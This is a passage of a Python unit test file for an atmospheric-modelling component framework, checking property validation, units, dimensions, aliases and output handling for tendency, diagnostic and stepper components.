assert len(diagnostics['output1'].dims) == 1
assert 'dim1' in diagnostics['output1'].dims
assert 'units' in diagnostics['output1'].attrs
assert diagnostics['output1'].attrs['units'] == 'm'
assert np.all(diagnostics['output1'].values == np.ones([10]))
def test_raises_when_diagnostic_not_given(self):
diagnostic_properties = {
'diag1': {
'dims': ['dims1'],
'units': 'm',
}
}
diagnostic_output = {}
diagnostic = self.get_component(
diagnostic_properties=diagnostic_properties,
diagnostic_output=diagnostic_output
)
state = {'time': timedelta(0)}
with self.assertRaises(ComponentMissingOutputError):
self.call_component(diagnostic, state)
def test_raises_when_extraneous_diagnostic_given(self):
diagnostic_properties = {}
diagnostic_output = {
'diag1': np.zeros([10])
}
diagnostic = self.get_component(
diagnostic_properties=diagnostic_properties,
diagnostic_output=diagnostic_output
)
state = {'time': timedelta(0)}
with self.assertRaises(ComponentExtraOutputError):
self.call_component(diagnostic, state)
class PrognosticTests(unittest.TestCase, InputTestBase):
component_class = MockTendencyComponent
def call_component(self, component, state):
return component(state)
def get_component(
self, input_properties=None, tendency_properties=None,
diagnostic_properties=None, tendency_output=None,
diagnostic_output=None):
return MockTendencyComponent(
input_properties=input_properties or {},
tendency_properties=tendency_properties or {},
diagnostic_properties=diagnostic_properties or {},
tendency_output=tendency_output or {},
diagnostic_output=diagnostic_output or {},
)
def get_diagnostics(self, result):
return result[1]
def test_raises_on_tendency_properties_of_wrong_type(self):
with self.assertRaises(InvalidPropertyDictError):
self.get_component(tendency_properties=({},))
def test_cannot_use_bad_component(self):
component = BadMockTendencyComponent()
with self.assertRaises(RuntimeError):
self.call_component(component, {'time': timedelta(0)})
def test_subclass_check(self):
class MyPrognostic(object):
input_properties = {}
diagnostic_properties = {}
tendency_properties = {}
tendencies_in_diagnostics = False
name = ''
def __call__(self):
pass
def array_call(self):
pass
instance = MyPrognostic()
assert isinstance(instance, TendencyComponent)
def test_tendency_raises_when_units_incompatible_with_input(self):
input_properties = {
'input1': {'units': 'km', 'dims': ['dim1', 'dim2']}
}
tendency_properties = {
'input1': {'units': 'degK/s', 'dims': ['dim1', 'dim2']}
}
with self.assertRaises(InvalidPropertyDictError):
self.get_component(
input_properties=input_properties,
tendency_properties=tendency_properties
)
def test_two_components_are_not_instances_of_each_other(self):
class MyTendencyComponent1(TendencyComponent):
input_properties = {}
diagnostic_properties = {}
tendency_properties = {}
tendencies_in_diagnostics = False
name = ''
def array_call(self, state):
pass
class MyTendencyComponent2(TendencyComponent):
input_properties = {}
diagnostic_properties = {}
tendency_properties = {}
tendencies_in_diagnostics = False
name = ''
def array_call(self, state):
pass
prog1 = MyTendencyComponent1()
prog2 = MyTendencyComponent2()
assert not isinstance(prog1, MyTendencyComponent2)
assert not isinstance(prog2, MyTendencyComponent1)
def test_ducktype_not_instance_of_subclass(self):
class MyPrognostic1(object):
input_properties = {}
diagnostic_properties = {}
tendency_properties = {}
tendencies_in_diagnostics = False
name = ''
def __init__(self):
pass
def array_call(self, state):
pass
class MyTendencyComponent2(TendencyComponent):
input_properties = {}
diagnostic_properties = {}
tendency_properties = {}
tendencies_in_diagnostics = False
name = ''
def array_call(self, state):
pass
prog1 = MyPrognostic1()
assert not isinstance(prog1, MyTendencyComponent2)
def test_empty_prognostic(self):
prognostic = self.component_class({}, {}, {}, {}, {})
tendencies, diagnostics = self.call_component(
prognostic, {'time': timedelta(seconds=0)})
assert tendencies == {}
assert diagnostics == {}
assert len(prognostic.state_given) == 1
assert 'time' in prognostic.state_given.keys()
assert prognostic.state_given['time'] == timedelta(seconds=0)
assert prognostic.times_called == 1
def test_tendency_requires_dims(self):
input_properties = {}
diagnostic_properties = {}
tendency_properties = {'tend1': {'units': 'm'}}
diagnostic_output = {}
tendency_output = {}
with self.assertRaises(InvalidPropertyDictError):
self.component_class(
input_properties, diagnostic_properties,
tendency_properties,
diagnostic_output, tendency_output
)
def test_tendency_uses_base_dims(self):
input_properties = {'diag1': {'dims': ['dim1'], 'units': 'm'}}
diagnostic_properties = {}
tendency_properties = {'diag1': {'units': 'm/s'}}
diagnostic_output = {}
tendency_output = {}
self.component_class(
input_properties, diagnostic_properties,
tendency_properties,
diagnostic_output, tendency_output
)
def test_tendency_doesnt_use_base_units(self):
input_properties = {'diag1': {'dims': ['dim1'], 'units': 'm'}}
diagnostic_properties = {}
tendency_properties = {'diag1': {'dims': ['dim1']}}
diagnostic_output = {}
tendency_output = {}
with self.assertRaises(InvalidPropertyDictError):
self.component_class(
input_properties, diagnostic_properties,
tendency_properties,
diagnostic_output, tendency_output
)
def test_tendency_requires_units(self):
input_properties = {}
diagnostic_properties = {}
tendency_properties = {'tend1': {'dims': ['dim1']}}
diagnostic_output = {}
tendency_output = {}
with self.assertRaises(InvalidPropertyDictError):
self.component_class(
input_properties, diagnostic_properties,
tendency_properties,
diagnostic_output, tendency_output
)
def test_raises_when_tendency_not_given(self):
input_properties = {}
diagnostic_properties = {}
tendency_properties = {
'tend1': {
'dims': ['dims1'],
'units': 'm',
}
}
diagnostic_output = {}
tendency_output = {}
prognostic = self.component_class(
input_properties, diagnostic_properties, tendency_properties,
diagnostic_output, tendency_output
)
state = {'time': timedelta(0)}
with self.assertRaises(ComponentMissingOutputError):
_, _ = self.call_component(prognostic, state)
def test_cannot_overlap_input_aliases(self):
input_properties = {
'input1': {'dims': ['dim1'], 'units': 'm', 'alias': 'input'},
'input2': {'dims': ['dim1'], 'units': 'm', 'alias': 'input'}
}
diagnostic_properties = {}
tendency_properties = {}
diagnostic_output = {}
tendency_output = {}
with self.assertRaises(InvalidPropertyDictError):
self.component_class(
input_properties, diagnostic_properties,
tendency_properties,
diagnostic_output, tendency_output
)
def test_cannot_overlap_diagnostic_aliases(self):
input_properties = {
}
diagnostic_properties = {
'diag1': {'dims': ['dim1'], 'units': 'm', 'alias': 'diag'},
'diag2': {'dims': ['dim1'], 'units': 'm', 'alias': 'diag'}
}
tendency_properties = {}
diagnostic_output = {}
tendency_output = {}
with self.assertRaises(InvalidPropertyDictError):
self.component_class(
input_properties, diagnostic_properties,
tendency_properties,
diagnostic_output, tendency_output
)
def test_cannot_overlap_tendency_aliases(self):
input_properties = {
}
diagnostic_properties = {
}
tendency_properties = {
'tend1': {'dims': ['dim1'], 'units': 'm', 'alias': 'tend'},
'tend2': {'dims': ['dim1'], 'units': 'm', 'alias': 'tend'}
}
diagnostic_output = {}
tendency_output = {}
with self.assertRaises(InvalidPropertyDictError):
self.component_class(
input_properties, diagnostic_properties,
tendency_properties,
diagnostic_output, tendency_output
)
def test_raises_when_extraneous_tendency_given(self):
input_properties = {}
diagnostic_properties = {}
tendency_properties = {}
diagnostic_output = {}
tendency_output = {
'tend1': np.zeros([10]),
}
prognostic = self.component_class(
input_properties, diagnostic_properties, tendency_properties,
diagnostic_output, tendency_output
)
state = {'time': timedelta(0)}
with self.assertRaises(ComponentExtraOutputError):
_, _ = self.call_component(prognostic, state)
def test_raises_when_diagnostic_not_given(self):
input_properties = {}
diagnostic_properties = {
'diag1': {
'dims': ['dims1'],
'units': 'm',
}
}
tendency_properties = {}
diagnostic_output = {}
tendency_output = {}
prognostic = self.component_class(
input_properties, diagnostic_properties, tendency_properties,
diagnostic_output, tendency_output
)
state = {'time': timedelta(0)}
with self.assertRaises(ComponentMissingOutputError):
_, _ = self.call_component(prognostic, state)
def test_raises_when_extraneous_diagnostic_given(self):
input_properties = {}
diagnostic_properties = {}
tendency_properties = {}
diagnostic_output = {
'diag1': np.zeros([10])
}
tendency_output = {}
prognostic = self.component_class(
input_properties, diagnostic_properties, tendency_properties,
diagnostic_output, tendency_output
)
state = {'time': timedelta(0)}
with self.assertRaises(ComponentExtraOutputError):
_, _ = self.call_component(prognostic, state)
def test_tendencies_no_transformations(self):
input_properties = {}
diagnostic_properties = {}
tendency_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm/s'
}}
diagnostic_output = {}
tendency_output = {
'output1': np.ones([10]),
}
prognostic = self.component_class(
input_properties, diagnostic_properties, tendency_properties,
diagnostic_output, tendency_output
)
state = {'time': timedelta(0)}
tendencies, _ = self.call_component(prognostic, state)
assert len(tendencies) == 1
assert 'output1' in tendencies.keys()
assert isinstance(tendencies['output1'], DataArray)
assert len(tendencies['output1'].dims) == 1
assert 'dim1' in tendencies['output1'].dims
assert 'units' in tendencies['output1'].attrs
assert len(tendencies['output1'].attrs) == 1
assert tendencies['output1'].attrs['units'] == 'm/s'
assert np.all(tendencies['output1'].values == np.ones([10]))
def test_tendencies_with_alias(self):
input_properties = {}
diagnostic_properties = {}
tendency_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm/s',
'alias': 'out1',
}}
diagnostic_output = {}
tendency_output = {
'out1': np.ones([10]),
}
prognostic = self.component_class(
input_properties, diagnostic_properties, tendency_properties,
diagnostic_output, tendency_output
)
state = {'time': timedelta(0)}
tendencies, _ = self.call_component(prognostic, state)
assert len(tendencies) == 1
assert 'output1' in tendencies.keys()
assert isinstance(tendencies['output1'], DataArray)
assert len(tendencies['output1'].dims) == 1
assert 'dim1' in tendencies['output1'].dims
assert 'units' in tendencies['output1'].attrs
assert tendencies['output1'].attrs['units'] == 'm/s'
assert np.all(tendencies['output1'].values == np.ones([10]))
def test_tendencies_with_alias_from_input(self):
input_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm',
'alias': 'out1',
}
}
diagnostic_properties = {}
tendency_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm/s',
}
}
diagnostic_output = {}
tendency_output = {
'out1': np.ones([10]),
}
prognostic = self.component_class(
input_properties, diagnostic_properties, tendency_properties,
diagnostic_output, tendency_output
)
state = {
'time': timedelta(0),
'output1': DataArray(
np.ones([10]),
dims=['dim1'],
attrs={'units': 'm'}
)
}
tendencies, _ = self.call_component(prognostic, state)
assert len(tendencies) == 1
assert 'output1' in tendencies.keys()
assert isinstance(tendencies['output1'], DataArray)
assert len(tendencies['output1'].dims) == 1
assert 'dim1' in tendencies['output1'].dims
assert 'units' in tendencies['output1'].attrs
assert tendencies['output1'].attrs['units'] == 'm/s'
assert np.all(tendencies['output1'].values == np.ones([10]))
def test_tendencies_with_dims_from_input(self):
input_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm',
}
}
diagnostic_properties = {}
tendency_properties = {
'output1': {
'units': 'm/s',
}
}
diagnostic_output = {}
tendency_output = {
'output1': np.ones([10]),
}
prognostic = self.component_class(
input_properties, diagnostic_properties, tendency_properties,
diagnostic_output, tendency_output
)
state = {
'time': timedelta(0),
'output1': DataArray(
np.ones([10]),
dims=['dim1'],
attrs={'units': 'm'}
)
}
tendencies, _ = self.call_component(prognostic, state)
assert len(tendencies) == 1
assert 'output1' in tendencies.keys()
assert isinstance(tendencies['output1'], DataArray)
assert len(tendencies['output1'].dims) == 1
assert 'dim1' in tendencies['output1'].dims
assert 'units' in tendencies['output1'].attrs
assert tendencies['output1'].attrs['units'] == 'm/s'
assert np.all(tendencies['output1'].values == np.ones([10]))
def test_tendencies_in_diagnostics_no_tendency(self):
input_properties = {}
diagnostic_properties = {}
tendency_properties = {}
diagnostic_output = {}
tendency_output = {}
prognostic = self.component_class(
input_properties, diagnostic_properties, tendency_properties,
diagnostic_output, tendency_output, tendencies_in_diagnostics=True
)
assert prognostic.input_properties == {}
assert prognostic.diagnostic_properties == {}
assert prognostic.tendency_properties == {}
state = {'time': timedelta(0)}
_, diagnostics = self.call_component(prognostic, state)
assert diagnostics == {}
def test_tendencies_in_diagnostics_one_tendency(self):
input_properties = {}
diagnostic_properties = {}
tendency_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm/s'
}
}
diagnostic_output = {}
tendency_output = {
'output1': np.ones([10]) * 20.,
}
prognostic = self.component_class(
input_properties, diagnostic_properties, tendency_properties,
diagnostic_output, tendency_output, tendencies_in_diagnostics=True,
)
tendency_name = 'output1_tendency_from_{}'.format(prognostic.__class__.__name__)
assert len(prognostic.diagnostic_properties) == 1
assert tendency_name in prognostic.diagnostic_properties.keys()
properties = prognostic.diagnostic_properties[tendency_name]
assert properties['dims'] == ['dim1']
assert properties['units'] == 'm/s'
state = {
'time': timedelta(0),
}
_, diagnostics = self.call_component(prognostic, state)
assert tendency_name in diagnostics.keys()
assert len(
diagnostics[tendency_name].dims) == 1
assert 'dim1' in diagnostics[tendency_name].dims
assert diagnostics[tendency_name].attrs['units'] == 'm/s'
assert np.all(diagnostics[tendency_name].values == 20.)
def test_tendencies_in_diagnostics_one_tendency_dims_from_input(self):
input_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm',
}
}
diagnostic_properties = {}
tendency_properties = {
'output1': {
'units': 'm/s'
}
}
diagnostic_output = {}
tendency_output = {
'output1': np.ones([10]) * 20.,
}
prognostic = self.component_class(
input_properties, diagnostic_properties, tendency_properties,
diagnostic_output, tendency_output, tendencies_in_diagnostics=True,
)
tendency_name = 'output1_tendency_from_{}'.format(prognostic.__class__.__name__)
assert len(prognostic.diagnostic_properties) == 1
assert tendency_name in prognostic.diagnostic_properties.keys()
properties = prognostic.diagnostic_properties[tendency_name]
assert properties['dims'] == ['dim1']
assert properties['units'] == 'm/s'
state = {
'time': timedelta(0),
'output1': DataArray(
np.ones([10]),
dims=['dim1'],
attrs={'units': 'm'}),
}
_, diagnostics = self.call_component(prognostic, state)
assert tendency_name in diagnostics.keys()
assert len(
diagnostics[tendency_name].dims) == 1
assert 'dim1' in diagnostics[tendency_name].dims
assert diagnostics[tendency_name].attrs['units'] == 'm/s'
assert np.all(diagnostics[tendency_name].values == 20.)
def test_tendencies_in_diagnostics_one_tendency_with_component_name(self):
input_properties = {}
diagnostic_properties = {}
tendency_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm/s'
}
}
diagnostic_output = {}
tendency_output = {
'output1': np.ones([10]) * 20.,
}
prognostic = self.component_class(
input_properties, diagnostic_properties, tendency_properties,
diagnostic_output, tendency_output, tendencies_in_diagnostics=True,
name='component',
)
tendency_name = 'output1_tendency_from_component'
assert len(prognostic.diagnostic_properties) == 1
assert tendency_name in prognostic.diagnostic_properties.keys()
properties = prognostic.diagnostic_properties[tendency_name]
assert properties['dims'] == ['dim1']
assert properties['units'] == 'm/s'
state = {
'time': timedelta(0),
}
_, diagnostics = self.call_component(prognostic, state)
print(diagnostics.keys())
assert tendency_name in diagnostics.keys()
assert len(
diagnostics[tendency_name].dims) == 1
assert 'dim1' in diagnostics[tendency_name].dims
assert diagnostics[tendency_name].attrs['units'] == 'm/s'
assert np.all(diagnostics[tendency_name].values == 20.)
class ImplicitPrognosticTests(PrognosticTests):
component_class = MockImplicitTendencyComponent
def call_component(self, component, state):
return component(state, timedelta(seconds=1))
def get_component(
self, input_properties=None, tendency_properties=None,
diagnostic_properties=None, tendency_output=None,
diagnostic_output=None):
return MockImplicitTendencyComponent(
input_properties=input_properties or {},
tendency_properties=tendency_properties or {},
diagnostic_properties=diagnostic_properties or {},
tendency_output=tendency_output or {},
diagnostic_output=diagnostic_output or {},
)
def test_cannot_use_bad_component(self):
component = BadMockImplicitTendencyComponent()
with self.assertRaises(RuntimeError):
self.call_component(component, {'time': timedelta(0)})
def test_subclass_check(self):
class MyImplicitPrognostic(object):
input_properties = {}
diagnostic_properties = {}
tendency_properties = {}
tendencies_in_diagnostics = False
name = ''
def __call__(self, state, timestep):
pass
def array_call(self, state, timestep):
pass
instance = MyImplicitPrognostic()
assert isinstance(instance, ImplicitTendencyComponent)
def test_two_components_are_not_instances_of_each_other(self):
class MyImplicitTendencyComponent1(ImplicitTendencyComponent):
input_properties = {}
diagnostic_properties = {}
tendency_properties = {}
tendencies_in_diagnostics = False
name = ''
def array_call(self, state, timestep):
pass
class MyImplicitTendencyComponent2(ImplicitTendencyComponent):
input_properties = {}
diagnostic_properties = {}
tendency_properties = {}
tendencies_in_diagnostics = False
name = ''
def array_call(self, state):
pass
prog1 = MyImplicitTendencyComponent1()
prog2 = MyImplicitTendencyComponent2()
assert not isinstance(prog1, MyImplicitTendencyComponent2)
assert not isinstance(prog2, MyImplicitTendencyComponent1)
def test_ducktype_not_instance_of_subclass(self):
class MyImplicitPrognostic1(object):
input_properties = {}
diagnostic_properties = {}
tendency_properties = {}
tendencies_in_diagnostics = False
name = ''
def __init__(self):
pass
def array_call(self, state, timestep):
pass
class MyImplicitTendencyComponent2(ImplicitTendencyComponent):
input_properties = {}
diagnostic_properties = {}
tendency_properties = {}
tendencies_in_diagnostics = False
name = ''
def array_call(self, state):
pass
prog1 = MyImplicitPrognostic1()
assert not isinstance(prog1, MyImplicitTendencyComponent2)
def test_subclass_is_not_prognostic(self):
class MyImplicitTendencyComponent(ImplicitTendencyComponent):
input_properties = {}
diagnostic_properties = {}
tendency_properties = {}
tendencies_in_diagnostics = False
name = ''
def array_call(self, state, timestep):
pass
instance = MyImplicitTendencyComponent()
assert not isinstance(instance, TendencyComponent)
def test_ducktype_is_not_prognostic(self):
class MyImplicitPrognostic(object):
input_properties = {}
diagnostic_properties = {}
tendency_properties = {}
tendencies_in_diagnostics = False
name = ''
def __call__(self, state, timestep):
pass
def array_call(self, state, timestep):
pass
instance = MyImplicitPrognostic()
assert not isinstance(instance, TendencyComponent)
def test_timedelta_is_passed(self):
prognostic = MockImplicitTendencyComponent({}, {}, {}, {}, {})
tendencies, diagnostics = prognostic(
{'time': timedelta(seconds=0)}, timedelta(seconds=5))
assert tendencies == {}
assert diagnostics == {}
assert prognostic.timestep_given == timedelta(seconds=5)
assert prognostic.times_called == 1
class DiagnosticTests(unittest.TestCase, InputTestBase, DiagnosticTestBase):
component_class = MockDiagnosticComponent
def call_component(self, component, state):
return component(state)
def get_component(
self, input_properties=None,
diagnostic_properties=None,
diagnostic_output=None):
return MockDiagnosticComponent(
input_properties=input_properties or {},
diagnostic_properties=diagnostic_properties or {},
diagnostic_output=diagnostic_output or {},
)
def get_diagnostics(self, result):
return result
def test_cannot_use_bad_component(self):
component = BadMockDiagnosticComponent()
with self.assertRaises(RuntimeError):
self.call_component(component, {'time': timedelta(0)})
def test_subclass_check(self):
class MyDiagnostic(object):
input_properties = {}
diagnostic_properties = {}
def __call__(self, state):
pass
def array_call(self, state):
pass
instance = MyDiagnostic()
assert isinstance(instance, DiagnosticComponent)
def test_two_components_are_not_instances_of_each_other(self):
class MyDiagnosticComponent1(DiagnosticComponent):
input_properties = {}
diagnostic_properties = {}
def array_call(self, state):
pass
class MyDiagnosticComponent2(DiagnosticComponent):
input_properties = {}
diagnostic_properties = {}
def array_call(self, state):
pass
diag1 = MyDiagnosticComponent1()
diag2 = MyDiagnosticComponent2()
assert not isinstance(diag1, MyDiagnosticComponent2)
assert not isinstance(diag2, MyDiagnosticComponent1)
def test_ducktype_not_instance_of_subclass(self):
class MyDiagnostic1(object):
input_properties = {}
diagnostic_properties = {}
def __init__(self):
pass
def array_call(self, state):
pass
class MyDiagnosticComponent2(DiagnosticComponent):
input_properties = {}
diagnostic_properties = {}
def array_call(self, state):
pass
diag1 = MyDiagnostic1()
assert not isinstance(diag1, MyDiagnosticComponent2)
def test_empty_diagnostic(self):
diagnostic = self.component_class({}, {}, {})
diagnostics = diagnostic({'time': timedelta(seconds=0)})
assert diagnostics == {}
assert len(diagnostic.state_given) == 1
assert 'time' in diagnostic.state_given.keys()
assert diagnostic.state_given['time'] == timedelta(seconds=0)
assert diagnostic.times_called == 1
class ImplicitTests(unittest.TestCase, InputTestBase, DiagnosticTestBase):
component_class = MockStepper
def call_component(self, component, state):
return component(state, timedelta(seconds=1))
def get_component(
self, input_properties=None, output_properties=None,
diagnostic_properties=None, state_output=None,
diagnostic_output=None):
return MockStepper(
input_properties=input_properties or {},
output_properties=output_properties or {},
diagnostic_properties=diagnostic_properties or {},
state_output=state_output or {},
diagnostic_output=diagnostic_output or {},
)
def get_diagnostics(self, result):
return result[0]
def test_raises_on_output_properties_of_wrong_type(self):
with self.assertRaises(InvalidPropertyDictError):
self.get_component(output_properties=({},))
def test_cannot_use_bad_component(self):
component = BadMockStepper()
with self.assertRaises(RuntimeError):
self.call_component(component, {'time': timedelta(0)})
def test_subclass_check(self):
class MyImplicit(object):
input_properties = {}
diagnostic_properties = {}
output_properties = {}
tendencies_in_diagnostics = False
name = ''
def __call__(self, state, timestep):
pass
def array_call(self, state, timestep):
pass
instance = MyImplicit()
assert isinstance(instance, Stepper)
def test_output_raises_when_units_incompatible_with_input(self):
input_properties = {
'input1': {'units': 'km', 'dims': ['dim1', 'dim2']}
}
output_properties = {
'input1': {'units': 'degK', 'dims': ['dim1', 'dim2']}
}
with self.assertRaises(InvalidPropertyDictError):
self.get_component(
input_properties=input_properties,
output_properties=output_properties,
)
def test_two_components_are_not_instances_of_each_other(self):
class MyStepper1(Stepper):
input_properties = {}
diagnostic_properties = {}
output_properties = {}
tendencies_in_diagnostics = False
name = ''
def array_call(self, state):
pass
class MyStepper2(Stepper):
input_properties = {}
diagnostic_properties = {}
output_properties = {}
tendencies_in_diagnostics = False
name = ''
def array_call(self, state):
pass
implicit1 = MyStepper1()
implicit2 = MyStepper2()
assert not isinstance(implicit1, MyStepper2)
assert not isinstance(implicit2, MyStepper1)
def test_ducktype_not_instance_of_subclass(self):
class MyImplicit1(object):
input_properties = {}
diagnostic_properties = {}
output_properties = {}
tendencies_in_diagnostics = False
name = ''
def __init__(self):
pass
def array_call(self, state):
pass
class MyStepper2(Stepper):
input_properties = {}
diagnostic_properties = {}
output_properties = {}
tendencies_in_diagnostics = False
name = ''
def array_call(self, state):
pass
implicit1 = MyImplicit1()
assert not isinstance(implicit1, MyStepper2)
def test_empty_implicit(self):
implicit = self.component_class(
{}, {}, {}, {}, {})
tendencies, diagnostics = self.call_component(
implicit, {'time': timedelta(seconds=0)})
assert tendencies == {}
assert diagnostics == {}
assert len(implicit.state_given) == 1
assert 'time' in implicit.state_given.keys()
assert implicit.state_given['time'] == timedelta(seconds=0)
assert implicit.times_called == 1
def test_output_requires_dims(self):
input_properties = {}
diagnostic_properties = {}
output_properties = {'diag1': {'units': 'm'}}
diagnostic_output = {}
state_output = {}
with self.assertRaises(InvalidPropertyDictError):
self.component_class(
input_properties, diagnostic_properties,
output_properties,
diagnostic_output, state_output
)
def test_output_uses_base_dims(self):
input_properties = {'diag1': {'dims': ['dim1'], 'units': 'm'}}
diagnostic_properties = {}
output_properties = {'diag1': {'units': 'm'}}
diagnostic_output = {}
state_output = {}
self.component_class(
input_properties, diagnostic_properties,
output_properties,
diagnostic_output, state_output
)
def test_output_doesnt_use_base_units(self):
input_properties = {'diag1': {'dims': ['dim1'], 'units': 'm'}}
diagnostic_properties = {}
output_properties = {'diag1': {'dims': ['dim1']}}
diagnostic_output = {}
state_output = {}
with self.assertRaises(InvalidPropertyDictError):
self.component_class(
input_properties, diagnostic_properties,
output_properties,
diagnostic_output, state_output
)
def test_output_requires_units(self):
input_properties = {}
diagnostic_properties = {}
output_properties = {'output1': {'dims': ['dim1']}}
diagnostic_output = {}
state_output = {}
with self.assertRaises(InvalidPropertyDictError):
self.component_class(
input_properties, diagnostic_properties,
output_properties,
diagnostic_output, state_output
)
def test_cannot_overlap_output_aliases(self):
input_properties = {
}
diagnostic_properties = {
}
output_properties = {
'out1': {'dims': ['dim1'], 'units': 'm', 'alias': 'out'},
'out2': {'dims': ['dim1'], 'units': 'm', 'alias': 'out'}
}
diagnostic_output = {}
output_state = {}
with self.assertRaises(InvalidPropertyDictError):
self.component_class(
input_properties, diagnostic_properties,
output_properties,
diagnostic_output, output_state
)
def test_timedelta_is_passed(self):
implicit = MockStepper({}, {}, {}, {}, {})
tendencies, diagnostics = implicit(
{'time': timedelta(seconds=0)}, timedelta(seconds=5))
assert tendencies == {}
assert diagnostics == {}
assert implicit.timestep_given == timedelta(seconds=5)
assert implicit.times_called == 1
def test_raises_when_output_not_given(self):
input_properties = {}
diagnostic_properties = {}
output_properties = {
'output1': {
'dims': ['dims1'],
'units': 'm',
}
}
diagnostic_output = {}
state_output = {}
implicit = self.component_class(
input_properties, diagnostic_properties, output_properties,
diagnostic_output, state_output
)
state = {'time': timedelta(0)}
with self.assertRaises(ComponentMissingOutputError):
_, _ = self.call_component(implicit, state)
def test_raises_when_extraneous_output_given(self):
input_properties = {}
diagnostic_properties = {}
output_properties = {}
diagnostic_output = {}
state_output = {
'tend1': np.zeros([10]),
}
implicit = self.component_class(
input_properties, diagnostic_properties, output_properties,
diagnostic_output, state_output
)
state = {'time': timedelta(0)}
with self.assertRaises(ComponentExtraOutputError):
_, _ = self.call_component(implicit, state)
def test_output_no_transformations(self):
input_properties = {}
diagnostic_properties = {}
output_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm/s'
}}
diagnostic_output = {}
output_state = {
'output1': np.ones([10]),
}
prognostic = self.component_class(
input_properties, diagnostic_properties, output_properties,
diagnostic_output, output_state
)
state = {'time': timedelta(0)}
_, output = self.call_component(prognostic, state)
assert len(output) == 1
assert 'output1' in output.keys()
assert isinstance(output['output1'], DataArray)
assert len(output['output1'].dims) == 1
assert 'dim1' in output['output1'].dims
assert 'units' in output['output1'].attrs
assert output['output1'].attrs['units'] == 'm/s'
assert np.all(output['output1'].values == np.ones([10]))
def test_output_with_alias(self):
input_properties = {}
diagnostic_properties = {}
output_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm/s',
'alias': 'out1',
}}
diagnostic_output = {}
output_state = {
'out1': np.ones([10]),
}
implicit = self.component_class(
input_properties, diagnostic_properties, output_properties,
diagnostic_output, output_state
)
state = {'time': timedelta(0)}
_, output = self.call_component(implicit, state)
assert len(output) == 1
assert 'output1' in output.keys()
assert isinstance(output['output1'], DataArray)
assert len(output['output1'].dims) == 1
assert 'dim1' in output['output1'].dims
assert 'units' in output['output1'].attrs
assert output['output1'].attrs['units'] == 'm/s'
assert np.all(output['output1'].values == np.ones([10]))
def test_output_with_alias_from_input(self):
input_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm',
'alias': 'out1',
}
}
diagnostic_properties = {}
output_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm',
}
}
diagnostic_output = {}
output_state = {
'out1': np.ones([10]),
}
implicit = self.component_class(
input_properties, diagnostic_properties, output_properties,
diagnostic_output, output_state
)
state = {
'time': timedelta(0),
'output1': DataArray(
np.ones([10]),
dims=['dim1'],
attrs={'units': 'm'}
)
}
_, output = self.call_component(implicit, state)
assert len(output) == 1
assert 'output1' in output.keys()
assert isinstance(output['output1'], DataArray)
assert len(output['output1'].dims) == 1
assert 'dim1' in output['output1'].dims
assert 'units' in output['output1'].attrs
assert output['output1'].attrs['units'] == 'm'
assert np.all(output['output1'].values == np.ones([10]))
def test_output_with_dims_from_input(self):
input_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm',
}
}
diagnostic_properties = {}
output_properties = {
'output1': {
'units': 'm',
}
}
diagnostic_output = {}
output_state = {
'output1': np.ones([10]),
}
implicit = self.component_class(
input_properties, diagnostic_properties, output_properties,
diagnostic_output, output_state
)
state = {
'time': timedelta(0),
'output1': DataArray(
np.ones([10]),
dims=['dim1'],
attrs={'units': 'm'}
)
}
_, output = self.call_component(implicit, state)
assert len(output) == 1
assert 'output1' in output.keys()
assert isinstance(output['output1'], DataArray)
assert len(output['output1'].dims) == 1
assert 'dim1' in output['output1'].dims
assert 'units' in output['output1'].attrs
assert output['output1'].attrs['units'] == 'm'
assert np.all(output['output1'].values == np.ones([10]))
def test_tendencies_in_diagnostics_no_tendency(self):
input_properties = {}
diagnostic_properties = {}
output_properties = {}
diagnostic_output = {}
output_state = {}
implicit = MockStepper(
input_properties, diagnostic_properties, output_properties,
diagnostic_output, output_state, tendencies_in_diagnostics=True
)
assert implicit.input_properties == {}
assert implicit.diagnostic_properties == {}
assert implicit.output_properties == {}
state = {'time': timedelta(0)}
diagnostics, _ = implicit(state, timedelta(seconds=5))
assert diagnostics == {}
def test_tendencies_in_diagnostics_one_tendency(self):
input_properties = {}
diagnostic_properties = {}
output_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm'
}
}
diagnostic_output = {}
output_state = {
'output1': np.ones([10]) * 20.,
}
implicit = MockStepper(
input_properties, diagnostic_properties, output_properties,
diagnostic_output, output_state, tendencies_in_diagnostics=True,
)
assert len(implicit.diagnostic_properties) == 1
assert 'output1_tendency_from_MockStepper' in implicit.diagnostic_properties.keys()
assert 'output1' in input_properties.keys(), 'Stepper needs original value to calculate tendency'
assert input_properties['output1']['dims'] == ['dim1']
assert input_properties['output1']['units'] == 'm'
properties = implicit.diagnostic_properties[
'output1_tendency_from_MockStepper']
assert properties['dims'] == ['dim1']
assert properties['units'] == 'm s^-1'
state = {
'time': timedelta(0),
'output1': DataArray(
np.ones([10])*10.,
dims=['dim1'],
attrs={'units': 'm'}
),
}
diagnostics, _ = implicit(state, timedelta(seconds=5))
assert 'output1_tendency_from_MockStepper' in diagnostics.keys()
assert len(
diagnostics['output1_tendency_from_MockStepper'].dims) == 1
assert 'dim1' in diagnostics['output1_tendency_from_MockStepper'].dims
assert diagnostics['output1_tendency_from_MockStepper'].attrs['units'] == 'm s^-1'
assert np.all(
diagnostics['output1_tendency_from_MockStepper'].values == 2.)
def test_tendencies_in_diagnostics_one_tendency_dims_from_input(self):
input_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm',
}
}
diagnostic_properties = {}
output_properties = {
'output1': {
'units': 'm'
}
}
diagnostic_output = {}
output_state = {
'output1': np.ones([10]) * 20.,
}
implicit = MockStepper(
input_properties, diagnostic_properties, output_properties,
diagnostic_output, output_state, tendencies_in_diagnostics=True,
)
assert len(implicit.diagnostic_properties) == 1
assert 'output1_tendency_from_MockStepper' in implicit.diagnostic_properties.keys()
assert 'output1' in input_properties.keys(), 'Stepper needs original value to calculate tendency'
assert input_properties['output1']['dims'] == ['dim1']
